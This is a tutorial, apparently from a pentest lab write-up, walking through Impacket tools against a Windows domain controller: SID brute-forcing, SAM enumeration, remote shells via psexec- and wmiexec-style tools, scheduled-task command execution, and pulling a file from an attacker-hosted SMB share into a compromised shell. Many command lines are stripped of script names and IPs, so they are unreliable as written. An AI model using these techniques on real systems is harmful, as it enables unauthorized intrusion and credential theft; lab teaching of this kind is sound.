Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC). According to the Core Security Website, Impacket supports protocols like IP, TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI, LDAP etc.

For the following practical we will require two systems,

  1. A Windows Server with Domain Controller Configured
  2. A Kali Linux

Here, in our lab scenario we have configured the following settings on our systems.

Windows Server Details

  • Domain: SERVER
  • User: Administrator
  • Password: T00r
  • IP Address:

Kali Linux:

Before beginning with the Impacket tools, let’s do a Nmap version scan on the target windows server to get the information about the services running on the Windows Server.

nmap sV

As you can see in the above screenshot, we have domain services, Kerberos Services, Netbios Services, LDAP services and Windows RPC services.

Now let’s install the Impacket tools from GitHub. You can get it from here.

Firstly, clone the git, and then install the Impacket as shown in the screenshot.

git clone

cd impacket/

python install

This will install Impacket on your Kali Linux, now after installation let’s look at what different tools does Impacket have in its box.

cd impacket/examples

These are the some of the tools included in impacket, let’s try some of them.

Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.


Syntax: ./ [Source IP] [Destination IP]


A Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@

As you can see that the lookupsid tool had extracted the user and group information from the server

It lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

/ SERVER/Administrator:T00r@

As you can see that we got a remote shell of the server in the given screenshot (note if last character of password = ! you get an error : bash: !@ event not found )

This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@

As you can see below we have the list of RPC targets

An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@
As you can see below we have extracted SAM information form the Target Server

root@kali:~/htb/dropzone/share# impacket-smbserver share ./
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed

c:\windows\system32>copy \\\share\whoami.exe
copy \\\share\whoami.exe
1 file(s) copied.

KALI htb/tally# impacket-smbserver share ./ -smb2support
LT-JACCO GroupPolicy Editor : Enable insecure guest logons
Within the latest “Windows 10 Fall Creators Update” the Guest access in SMB2 is disabled by default.

You can change this setting within your group policy settings.
Within the run box, type “gpedit.msc”
Within the local Group Policy Editor, select “Administrative Templates”
If you want to enable insecure guest access, you can configure the following Group Policy settings:
Computer configuration\administrative templates\network\Lanman Workstation
"Enable insecure guest logons"
Select OK

Simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface.

. /

Choose the interface using the number associated with it. And the sniffing starts.

Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.

. /

And the sniffer starts to monitor icmp, tcp and udp

It generates a semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. It runs as Administrator. It is highly stealthy.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@

As you can se below that we have the shell from the Target Server

It allows to issue WQL queries and get description of WMI objects at the target system.


Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:T00r@
This will open a shell, where you can run WQL queries like
SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.


Syntax: / [[domain/] username [: password] @] [Target IP Address] [Command]

./ SERVER/Administrator:T00r@ systeminfo
As you can see below that a remote connection was established to the server and the command systeminfo was run on the Target server with the output of the command delivered on the Kali terminal.

This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab) using a documented MSRPC feature.


Syntax: ./ -target [IP Address]

Command: ./ -target

Here we can see that the architecture of the target system is 64-bit


This script will bind to the target’s MGMT interface to get a list of interface IDs. It will use that list on top of another list of interfaces UUID and reports whether the interface is listed and/or listening.

Syntax: ./ [Host IP Address] [Port]

./ 135

./ 49154

Author: Jacco Straathof